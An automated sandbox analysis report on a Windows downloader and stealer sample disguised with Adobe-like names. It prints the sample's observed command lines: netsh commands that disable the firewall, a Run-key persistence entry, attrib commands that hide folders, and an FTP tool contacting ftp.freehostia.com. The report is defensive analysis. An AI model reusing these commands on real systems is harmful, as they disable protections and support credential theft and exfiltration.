Malware Analysis Report

2024-10-16 03:31

Sample ID 240827-waltzasfjc
Target c56ba0ec71222ed7354dfaafec5cf766_JaffaCakes118
SHA256 7115ea1ab97a7187b2a1bb6936fe3df44bc754ec06f70c9f880d9787e605ea60
Tags
banload collection credential_access discovery downloader dropper evasion persistence privilege_escalation spyware stealer trojan upx
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

7115ea1ab97a7187b2a1bb6936fe3df44bc754ec06f70c9f880d9787e605ea60

Threat Level: Known bad

The file c56ba0ec71222ed7354dfaafec5cf766_JaffaCakes118 was found to be: Known bad.

Malicious Activity Summary

banload collection credential_access discovery downloader dropper evasion persistence privilege_escalation spyware stealer trojan upx

Banload

Credentials from Password Stores: Credentials from Web Browsers

Identifies VirtualBox via ACPI registry values (likely anti-VM)

Modifies Windows Firewall

Sets file to hidden

Checks BIOS information in registry

Loads dropped DLL

Checks computer location settings

Executes dropped EXE

Reads user/profile data of web browsers

Reads local data of messenger clients

UPX packed file

Reads user/profile data of local email clients

Adds Run key to start application

Accesses Microsoft Outlook accounts

Event Triggered Execution: Netsh Helper DLL

Unsigned PE

Enumerates physical storage devices

System Location Discovery: System Language Discovery

Gathers network information

Suspicious use of WriteProcessMemory

Suspicious use of FindShellTrayWindow

Enumerates system info in registry

Suspicious use of AdjustPrivilegeToken

Views/modifies file attributes

Modifies registry class

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-08-27 17:43

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-08-27 17:43

Reported

2024-08-27 17:45

Platform

win7-20240704-en

Max time kernel

119s

Max time network

120s

Command Line

"C:\Users\Admin\AppData\Local\Temp\c56ba0ec71222ed7354dfaafec5cf766_JaffaCakes118.exe"

Signatures

Banload

trojan dropper downloader banload

Credentials from Password Stores: Credentials from Web Browsers

credential_access stealer

Identifies VirtualBox via ACPI registry values (likely anti-VM)

evasion
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AadobeRead\adbr01.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AadobeRead\adbr02.exe N/A

Modifies Windows Firewall

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\netsh.exe N/A
N/A N/A C:\Windows\SysWOW64\netsh.exe N/A
N/A N/A C:\Windows\SysWOW64\netsh.exe N/A
N/A N/A C:\Windows\SysWOW64\netsh.exe N/A

Sets file to hidden

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\attrib.exe N/A
N/A N/A C:\Windows\SysWOW64\attrib.exe N/A
N/A N/A C:\Windows\SysWOW64\attrib.exe N/A
N/A N/A C:\Windows\SysWOW64\attrib.exe N/A
N/A N/A C:\Windows\SysWOW64\attrib.exe N/A
N/A N/A C:\Windows\SysWOW64\attrib.exe N/A

Checks BIOS information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosDate C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AadobeRead\adbr01.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AadobeRead\adbr02.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosDate C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AadobeRead\adbr02.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AadobeRead\adbr01.exe N/A

Reads local data of messenger clients

spyware stealer

Reads user/profile data of local email clients

spyware stealer

Reads user/profile data of web browsers

spyware stealer

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Accesses Microsoft Outlook accounts

collection
Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-3434294380-2554721341-1919518612-1000\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AadobeRead\adbr02.exe N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-3434294380-2554721341-1919518612-1000\Software\Microsoft\Windows\CurrentVersion\Run\lodhgyuuuf = "C:\\Users\\Admin\\AppData\\Roaming\\Adobe\\Adobe Inc\\AdobeRead\\aijw01.bat" C:\Windows\SysWOW64\reg.exe N/A

Enumerates physical storage devices

Event Triggered Execution: Netsh Helper DLL

persistence privilege_escalation
Description Indicator Process Target
Key queried \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key queried \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key queried \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key queried \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AadobeRead\adbr02.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AadobeRead\Adobeta.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AadobeRead\adbr02.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AadobeRead\adbr01.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\c56ba0ec71222ed7354dfaafec5cf766_JaffaCakes118.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\ipconfig.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\attrib.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AadobeRead\Adobeta.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AadobeRead\adbr01.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\attrib.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\DllHost.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\xcopy.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\attrib.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AadobeRead\Adobeta.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WScript.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WScript.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\attrib.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\attrib.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\attrib.exe N/A

Enumerates system info in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier C:\Windows\SysWOW64\xcopy.exe N/A

Gathers network information

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\ipconfig.exe N/A

Modifies registry class

Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{71E816AE-B6E7-34BA-0341-332B111F53E6}\InProcServer32\ThreadingModel = "Apartment" C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AadobeRead\adbr01.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{71E816AE-B6E7-34BA-0341-332B111F53E6} C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AadobeRead\adbr01.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{71E816AE-B6E7-34BA-0341-332B111F53E6}\ = "Microsoft DocProp Inplace Droplist Combo Control" C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AadobeRead\adbr01.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{71E816AE-B6E7-34BA-0341-332B111F53E6}\InProcServer32 C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AadobeRead\adbr01.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{71E816AE-B6E7-34BA-0341-332B111F53E6}\InProcServer32\ = "%SystemRoot%\\SysWow64\\shell32.dll" C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AadobeRead\adbr01.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\DllHost.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1720 wrote to memory of 2016 N/A C:\Users\Admin\AppData\Local\Temp\c56ba0ec71222ed7354dfaafec5cf766_JaffaCakes118.exe C:\Windows\SysWOW64\WScript.exe
PID 1720 wrote to memory of 2016 N/A C:\Users\Admin\AppData\Local\Temp\c56ba0ec71222ed7354dfaafec5cf766_JaffaCakes118.exe C:\Windows\SysWOW64\WScript.exe
PID 1720 wrote to memory of 2016 N/A C:\Users\Admin\AppData\Local\Temp\c56ba0ec71222ed7354dfaafec5cf766_JaffaCakes118.exe C:\Windows\SysWOW64\WScript.exe
PID 1720 wrote to memory of 2016 N/A C:\Users\Admin\AppData\Local\Temp\c56ba0ec71222ed7354dfaafec5cf766_JaffaCakes118.exe C:\Windows\SysWOW64\WScript.exe
PID 2016 wrote to memory of 2236 N/A C:\Windows\SysWOW64\WScript.exe C:\Windows\SysWOW64\cmd.exe
PID 2016 wrote to memory of 2236 N/A C:\Windows\SysWOW64\WScript.exe C:\Windows\SysWOW64\cmd.exe
PID 2016 wrote to memory of 2236 N/A C:\Windows\SysWOW64\WScript.exe C:\Windows\SysWOW64\cmd.exe
PID 2016 wrote to memory of 2236 N/A C:\Windows\SysWOW64\WScript.exe C:\Windows\SysWOW64\cmd.exe
PID 2236 wrote to memory of 2676 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\xcopy.exe
PID 2236 wrote to memory of 2676 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\xcopy.exe
PID 2236 wrote to memory of 2676 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\xcopy.exe
PID 2236 wrote to memory of 2676 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\xcopy.exe
PID 2236 wrote to memory of 1960 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\attrib.exe
PID 2236 wrote to memory of 1960 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\attrib.exe
PID 2236 wrote to memory of 1960 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\attrib.exe
PID 2236 wrote to memory of 1960 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\attrib.exe
PID 2236 wrote to memory of 2872 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\attrib.exe
PID 2236 wrote to memory of 2872 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\attrib.exe
PID 2236 wrote to memory of 2872 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\attrib.exe
PID 2236 wrote to memory of 2872 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\attrib.exe
PID 2236 wrote to memory of 2968 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\attrib.exe
PID 2236 wrote to memory of 2968 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\attrib.exe
PID 2236 wrote to memory of 2968 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\attrib.exe
PID 2236 wrote to memory of 2968 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\attrib.exe
PID 2236 wrote to memory of 2260 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\attrib.exe
PID 2236 wrote to memory of 2260 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\attrib.exe
PID 2236 wrote to memory of 2260 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\attrib.exe
PID 2236 wrote to memory of 2260 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\attrib.exe
PID 2236 wrote to memory of 2848 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\attrib.exe
PID 2236 wrote to memory of 2848 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\attrib.exe
PID 2236 wrote to memory of 2848 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\attrib.exe
PID 2236 wrote to memory of 2848 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\attrib.exe
PID 2236 wrote to memory of 2856 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\attrib.exe
PID 2236 wrote to memory of 2856 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\attrib.exe
PID 2236 wrote to memory of 2856 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\attrib.exe
PID 2236 wrote to memory of 2856 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\attrib.exe
PID 2236 wrote to memory of 2840 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WScript.exe
PID 2236 wrote to memory of 2840 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WScript.exe
PID 2236 wrote to memory of 2840 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WScript.exe
PID 2236 wrote to memory of 2840 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WScript.exe
PID 2840 wrote to memory of 1276 N/A C:\Windows\SysWOW64\WScript.exe C:\Windows\SysWOW64\cmd.exe
PID 2840 wrote to memory of 1276 N/A C:\Windows\SysWOW64\WScript.exe C:\Windows\SysWOW64\cmd.exe
PID 2840 wrote to memory of 1276 N/A C:\Windows\SysWOW64\WScript.exe C:\Windows\SysWOW64\cmd.exe
PID 2840 wrote to memory of 1276 N/A C:\Windows\SysWOW64\WScript.exe C:\Windows\SysWOW64\cmd.exe
PID 1276 wrote to memory of 1584 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AadobeRead\Adobeta.exe
PID 1276 wrote to memory of 1584 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AadobeRead\Adobeta.exe
PID 1276 wrote to memory of 1584 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AadobeRead\Adobeta.exe
PID 1276 wrote to memory of 1584 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AadobeRead\Adobeta.exe
PID 1276 wrote to memory of 1164 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 1276 wrote to memory of 1164 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 1276 wrote to memory of 1164 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 1276 wrote to memory of 1164 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 1276 wrote to memory of 1256 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\ipconfig.exe
PID 1276 wrote to memory of 1256 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\ipconfig.exe
PID 1276 wrote to memory of 1256 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\ipconfig.exe
PID 1276 wrote to memory of 1256 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\ipconfig.exe
PID 1276 wrote to memory of 2108 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AadobeRead\adbr01.exe
PID 1276 wrote to memory of 2108 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AadobeRead\adbr01.exe
PID 1276 wrote to memory of 2108 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AadobeRead\adbr01.exe
PID 1276 wrote to memory of 2108 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AadobeRead\adbr01.exe
PID 2108 wrote to memory of 1228 N/A C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AadobeRead\adbr01.exe C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AadobeRead\adbr01.exe
PID 2108 wrote to memory of 1228 N/A C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AadobeRead\adbr01.exe C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AadobeRead\adbr01.exe
PID 2108 wrote to memory of 1228 N/A C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AadobeRead\adbr01.exe C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AadobeRead\adbr01.exe
PID 2108 wrote to memory of 1228 N/A C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AadobeRead\adbr01.exe C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AadobeRead\adbr01.exe

Views/modifies file attributes

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\attrib.exe N/A
N/A N/A C:\Windows\SysWOW64\attrib.exe N/A
N/A N/A C:\Windows\SysWOW64\attrib.exe N/A
N/A N/A C:\Windows\SysWOW64\attrib.exe N/A
N/A N/A C:\Windows\SysWOW64\attrib.exe N/A
N/A N/A C:\Windows\SysWOW64\attrib.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\c56ba0ec71222ed7354dfaafec5cf766_JaffaCakes118.exe

"C:\Users\Admin\AppData\Local\Temp\c56ba0ec71222ed7354dfaafec5cf766_JaffaCakes118.exe"

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\Local\4Adobe\4low\ZREA.vbs"

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Roaming\Local\4Adobe\4low\enikiol02.bat" /quiet /norestart"

C:\Windows\SysWOW64\DllHost.exe

C:\Windows\SysWOW64\DllHost.exe /Processid:{76D0CB12-7604-4048-B83C-1005C7DDC503}

C:\Windows\SysWOW64\xcopy.exe

xcopy /y /h /e /r /k /c *.* "C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AadobeRead\"

C:\Windows\SysWOW64\attrib.exe

attrib +r +a +s +h "C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead"

C:\Windows\SysWOW64\attrib.exe

attrib +r +a +s +h "C:\Users\Admin\AppData\Roaming\Adobe Reader\AdobeR"

C:\Windows\SysWOW64\attrib.exe

attrib +r +a +s +h "C:\Users\Admin\AppData\Roaming\Adobe Reader\ADBR\READER"

C:\Windows\SysWOW64\attrib.exe

attrib +r +a +s +h "C:\Users\Admin\AppData\Roaming\AdobeR\ADBR\READER"

C:\Windows\SysWOW64\attrib.exe

attrib +r +a +s +h "C:\Users\Admin\AppData\Roaming\AdobeR"

C:\Windows\SysWOW64\attrib.exe

attrib +r +a +s +h "C:\Users\Admin\AppData\Roaming\RAdobe\RADBR\AREADER"

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AadobeRead\nimiki09.vbs"

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Roaming\Adobe\Adobe INC\AadobeRead\enikiol03.bat" /quiet /norestart"

C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AadobeRead\Adobeta.exe

Adobeta.exe -x -x -x -d -nuttyhdff -s:nuttyhdff.nuttyhdff ftp.freehostia.com -nuttyhdff

C:\Windows\SysWOW64\reg.exe

REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "lodhgyuuuf" /t REG_SZ /F /D "C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\aijw01.bat"

C:\Windows\SysWOW64\ipconfig.exe

ipconfig /all

C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AadobeRead\adbr01.exe

adbr01.exe -f "011.011"

C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AadobeRead\adbr01.exe

adbr01.exe -f "011.011"

C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AadobeRead\adbr02.exe

adbr02.exe -f "112.112"

C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AadobeRead\adbr02.exe

adbr02.exe -f "112.112"

C:\Windows\SysWOW64\netsh.exe

netsh firewall set opmode disable

C:\Windows\SysWOW64\netsh.exe

netsh advfirewall set currentprofile state off

C:\Windows\SysWOW64\netsh.exe

netsh advfirewall set profiles state off

C:\Windows\SysWOW64\netsh.exe

NetSh Advfirewall set allprofiles state off

C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AadobeRead\Adobeta.exe

Adobeta.exe -a -c -d -natpasv -s:870.afr ftp.freehostia.com

C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AadobeRead\Adobeta.exe

Adobeta.exe -a -c -d -natpasv -s:sun.afr ftp.freehostia.com

C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AadobeRead\BReader.exe

BReader 5359

Network

Country Destination Domain Proto
US 8.8.8.8:53 ftp.freehostia.com udp
US 198.23.57.8:21 ftp.freehostia.com tcp
US 198.23.57.8:21 ftp.freehostia.com tcp

Files

C:\Users\Admin\AppData\Roaming\Local\4Adobe\4low\ZREA.vbs

MD5 d4773871db0e4b8cad180eab60250d3f
SHA1 5ce9259f9dea5985013c836c56ea6182a72c618a
SHA256 64681ae62fc11970f670e0d82efe4eb581cc0312d5c21b3082d7ac507543f3a6
SHA512 2b1ba8a8dc26ca4003cbe8e8d0920c571c5b39e5893bc1008d5a34bbbe4922812c2c8048df76ad28fa153bcaa236e890829c59596360494082dcf2a9ee9bac45

C:\Users\Admin\AppData\Roaming\Local\4Adobe\4low\enikiol02.bat

MD5 d363e3b328794fe3bb4c7161b912da38
SHA1 ea54f834acb70088ca03599591f20c41815b4a60
SHA256 58ed7e647f6d356847c9e9a39fcfa9d5bd6dd7409a402b2162926f635f93983c
SHA512 6e5f5404e78fd968c9d7f9e2dff3dbff0252dae17af70c1bc0e4589e892dca49fb9cdf3f932b1922137411bc754cc048edd71fe014dc4d93731c695bddffe61a

memory/2236-64-0x0000000002450000-0x0000000002452000-memory.dmp

memory/2084-65-0x00000000001E0000-0x00000000001E2000-memory.dmp

C:\Users\Admin\AppData\Roaming\Local\4Adobe\4low\adbr02.ght

MD5 a754735e5ac70d33fd528b079e503ff9
SHA1 d8a0069a07e9b6bd4f07eae04de331cd60f85eb8
SHA256 86f299063483f6134e634d6b356eb38a8e6a779cd0f3d495d49683c0cc9e8e24
SHA512 fed49537700f73abbb4cf7716d03c28010f5f69d280dc188c44c1826927f1ed247238d0983267b037a3b22a69c8668c27d3ccaa0618e303c8d930f4ccc281d9d

C:\Users\Admin\AppData\Roaming\Local\4Adobe\4low\adbr01.ght

MD5 4d432bd0929e1fad42c98584dda0b9f5
SHA1 c3381e2205b1e3493e28528cc3f18798c3ba5223
SHA256 ffadb8953d9f92020fb9bb1d31d58aa73383ba83f8b8e762802048db2171e58c
SHA512 bc5d8b1f6f1be46e91ca868320fde9fd0d9311710183e052adc7d112ec5ef42efd222d38dfea7e7292a882254ad5ff0f0dd6a6f0d6b7c8f957a23140111b9750

C:\Users\Admin\AppData\Roaming\Local\4Adobe\4low\870.afr

MD5 2a48c0bef4fca10233a53f40feda48a5
SHA1 42e9c79e06fa255083f307c64c2e89cda323b026
SHA256 d7e97baf9575e2f20698fc0538a4003abbd4fba46389072088ed54a8d2629d13
SHA512 f4f009211f93b536ce52900e795cfdb2e40dbba94c70a1156c600c7a98caa9d58dcb19e5f81ad9845a0ea03650ff3bef1267ac02d11828484b8f35423811f7eb

C:\Users\Admin\AppData\Roaming\Local\4Adobe\4low\aijw01.bat

MD5 426de1728c46d6b08f9ad56cf08ab872
SHA1 215e41275f0a1204b3c896f7efbc49700b353950
SHA256 bad31ec72d26efc643a53a2a838e14f179d3242cd6e4f85a16a0b95b17015684
SHA512 9a7131b6edb1e5c2deaafd3286077af939c0abaa7a83bbd19f85de52e56a0dabd9d657281ccc026553ee8e12a6fa49fd8b95a3bcc83bb7a84b48588f25b74a4e

C:\Users\Admin\AppData\Roaming\Local\4Adobe\4low\sun.afr

MD5 1fea6d4df76fb51523a03436c2a047fd
SHA1 6253e8fafc9cd795f72bc3aa9b988774bfb7c5d1
SHA256 497f1dbd7a649f47bbd645b89be11de834a499766d239623000530d751cc83e7
SHA512 5d05608daa4c6d9ac4b25fdc7df15831efbc571b594c12eada8d4b5c9a9ffe34426fc2ba0af4f7bf47253f3829077270cfb7f85cffbfb1eae12ad2bc27bba4d1

C:\Users\Admin\AppData\Roaming\Local\4Adobe\4low\nimiki09.vbs

MD5 2246aa37b209d0f04831b3f7d9a61edc
SHA1 00899b4b33f264afef734f622a1cf2bf8564dd02
SHA256 e0e34a17e7ac66b91149f3d744d9d765f8bc30bafe7a11c9e1cb13f881768c6d
SHA512 d97935c3afe6c85cc3212ae8b8bf47dfeb108c1c79690b453efbcfde1212e7d10a379331c4d7f67be773f8d36f954ac8516ba629f86a7345ba017f63daff90cd

